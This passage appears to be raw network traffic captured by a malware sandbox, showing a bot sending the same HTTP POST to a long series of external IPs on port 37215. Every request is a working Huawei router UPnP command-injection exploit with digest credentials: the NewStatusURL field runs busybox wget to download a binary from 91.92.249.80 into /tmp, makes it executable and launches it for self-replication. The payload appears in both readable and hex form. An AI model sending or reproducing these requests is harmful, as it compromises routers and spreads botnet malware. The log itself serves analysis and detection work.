                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1171192.168.2.235557441.119.228.4337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301285028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1172192.168.2.2349198102.98.110.11637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301294088 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1173192.168.2.234481495.14.88.737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301309109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1174192.168.2.2343558116.147.150.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301326990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1175192.168.2.236036441.24.82.12637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301327944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1176192.168.2.2349562197.184.3.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301341057 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1177192.168.2.2334908136.83.54.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301353931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1178192.168.2.235340241.191.51.11437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.305149078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1179192.168.2.235246841.224.95.11237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.305169106 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1180192.168.2.234597041.37.89.16937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.305196047 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1181192.168.2.2347046157.79.210.18537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.305227041 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
